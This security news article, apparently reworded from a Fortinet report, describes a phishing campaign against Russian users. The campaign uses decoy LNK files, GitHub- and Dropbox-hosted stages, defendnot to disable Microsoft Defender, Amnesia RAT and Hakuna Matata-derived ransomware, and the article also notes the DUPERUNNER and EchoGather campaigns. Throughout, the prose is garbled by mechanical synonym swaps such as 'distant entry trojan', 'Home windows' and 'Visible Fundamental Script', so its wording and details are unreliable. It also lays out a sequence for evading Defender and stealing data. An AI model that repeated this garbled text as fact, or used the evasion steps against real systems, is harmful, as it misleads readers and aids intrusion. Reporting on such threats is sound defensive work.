A brand new multi-stage phishing marketing campaign has been noticed focusing on customers in Russia with ransomware and a distant entry trojan known as Amnesia RAT.
“The assault begins with social engineering lures delivered through business-themed paperwork crafted to seem routine and benign,” Fortinet FortiGuard Labs researcher Cara Lin mentioned in a technical breakdown printed this week. “These paperwork and accompanying scripts function visible distractions, diverting victims to pretend duties or standing messages whereas malicious exercise runs silently within the background.”
The marketing campaign stands out for a few causes. First, it makes use of a number of public cloud companies to distribute totally different sorts of payloads. Whereas GitHub is principally used to distribute scripts, binary payloads are staged on Dropbox. This separation complicates takedown efforts, successfully enhancing resilience.
One other “defining attribute” of the marketing campaign, per Fortinet, is the operational abuse of defendnot to disable Microsoft Defender. Defendnot was launched final 12 months by a safety researcher who goes by the web alias es3n1n as a technique to trick the safety program into believing one other antivirus product has already put in on the Home windows host.
The marketing campaign leverages social engineering to distribute compressed archives, which comprise a number of decoy paperwork and a malicious Home windows shortcut (LNK) with Russian-language filenames. The LNK file makes use of a double extension (“Задание_для_бухгалтера_02отдела.txt.lnk”) to offer the impression that it is a textual content file.
When executed, it runs a PowerShell command to retrieve the next-stage PowerShell script hosted on a GitHub repository (“github[.]com/Mafin111/MafinREP111”), which then serves as a first-stage loader to determine a foothold, readies the system to cover proof of malicious exercise, and fingers off management circulate to subsequent phases.
“The script first suppresses seen execution by programmatically hiding the PowerShell console window,” Fortinet mentioned. “This removes any quick visible indicators {that a} script is working. It then generates a decoy textual content doc within the person’s native utility information listing. As soon as written to disk, the decoy doc is mechanically opened.”
As soon as the doc is exhibited to the sufferer to maintain up the ruse, the script sends a message to the attacker utilizing the Telegram Bot API, informing the operator that the primary stage has been efficiently executed. A deliberately-introduced 444 second delay later, the PowerShell script runs a Visible Fundamental Script (“SCRRC4ryuk.vbe”) hosted on the identical repository location.
This gives two essential benefits in that it retains the loader light-weight and permits the menace actors to replace or substitute the payload’s performance on the fly with out having to introduce any modifications to the assault chain itself.
The Visible Fundamental Script is very obfuscated and acts because the controller that assembles the next-stage payload instantly in reminiscence, thereby avoiding leaving any artifacts on disk. The ultimate-stage script checks if it is working with elevated privileges, and, if not, repeatedly shows a Consumer Account Management (UAC) immediate to power the sufferer to grant it the mandatory permissions. The script pauses for 3,000 milliseconds between makes an attempt.
Within the subsequent section, the malware initiates a collection of actions to suppress visibility, neutralize endpoint safety mechanisms, conduct reconnaissance, inhibit restoration, and finally deploy the primary payloads –
- Configure Microsoft Defender exclusions to forestall this system from scanning ProgramData, Program Recordsdata, Desktop, Downloads, and the system short-term listing
- Use PowerShell to show off further Defender safety parts
- Deploy defendnot to register a pretend antivirus product with the Home windows Safety Heart interface and trigger Microsoft Defender to disable itself to keep away from potential conflicts
- Conduct setting reconnaissance and surveillance through screenshot seize by way of a devoted .NET module downloaded from the GitHub repository that takes a screengrab each 30 seconds, put it aside as a PNG picture, and exfiltrates the information utilizing a Telegram bot
- Disable Home windows administrative and diagnostic instruments by tampering with the Registry-based coverage controls
- Implement a file affiliation hijacking mechanism such that opening recordsdata with sure predefined extensions causes a message to be exhibited to the sufferer, instructing them to contact the menace actor through Telegram
One of many remaining payloads deployed after efficiently disarming safety controls and restoration mechanisms is Amnesia RAT (“svchost.scr”), which is retrieved from Dropbox and is able to broad information theft and distant management. It is designed to pilfer info saved in internet browsers, cryptocurrency wallets, Discord, Steam, and Telegram, together with system metadata, screenshots, webcam pictures, microphone audio, clipboard, and energetic window title.
“The RAT allows full distant interplay, together with course of enumeration and termination, shell command execution, arbitrary payload deployment, and execution of further malware,” Fortinet mentioned. “Exfiltration is primarily carried out over HTTPS utilizing Telegram Bot APIs. Bigger datasets could also be uploaded to third-party file-hosting companies reminiscent of GoFile, with obtain hyperlinks relayed to the attacker through Telegram.”
In all, Amnesia RAT facilitates credential theft, session hijacking, monetary fraud, and real-time information gathering, turning it right into a complete software for account takeover and follow-on assaults.
The second payload delivered by the script is a ransomware that is derived from the Hakuna Matata ransomware household and is configured to encrypt paperwork, archives, pictures, media, supply code, and utility belongings on the contaminated endpoint, however not earlier than terminating any course of that might intrude with its functioning.
As well as, the ransomware retains tabs on clipboard contents and silently modifies cryptocurrency pockets addresses with attacker-controlled wallets to reroute transactions. The an infection sequence ends with the script deploying WinLocker to limit person interplay.
“This assault chain demonstrates how fashionable malware campaigns can obtain full system compromise with out exploiting software program vulnerabilities,” Lin concluded. “By systematically abusing native Home windows options, administrative instruments, and coverage enforcement mechanisms, the attacker disables endpoint defenses earlier than deploying persistent surveillance tooling and harmful payloads.”
To counter defendnot’s abuse of the Home windows Safety Heart API, Microsoft recommends that customers allow Tamper Safety to forestall unauthorized modifications to Defender settings and monitor for suspicious API calls or Defender service modifications.
The event comes as human assets, payroll, and inner administrative departments belonging to Russian company entities have been focused by a menace actor UNG0902 to ship an unknown implant dubbed DUPERUNNER that is accountable for loading AdaptixC2, a command-and-control (C2) framework. The spear-phishing marketing campaign, codenamed Operation DupeHike, has been ongoing since November 2025.
Seqrite Labs mentioned the assaults contain using decoy paperwork centered round themes associated to worker bonuses and inner monetary insurance policies to persuade recipients into opening a malicious LNK file inside ZIP archives that results in the execution of DUPERUNNER.
The implant reaches out to an exterior server to fetch and show a decoy PDF doc, whereas system profiling and the obtain of the AdaptixC2 beacon are carried out within the background.
In current months, Russian organizations have additionally been seemingly focused by one other menace actor tracked as Paper Werewolf (aka GOFFEE), which has employed synthetic intelligence (AI)-generated decoys and DLL recordsdata compiled as Excel XLL add-ins to ship a backdoor known as EchoGather.
“As soon as launched, the backdoor collects system info, communicates with a hardcoded command-and-control (C2) server, and helps command execution and file switch operations,” Intezer safety researcher Nicole Fishbein mentioned. It “communicates with the C2 over HTTP(S) utilizing the WinHTTP API.”
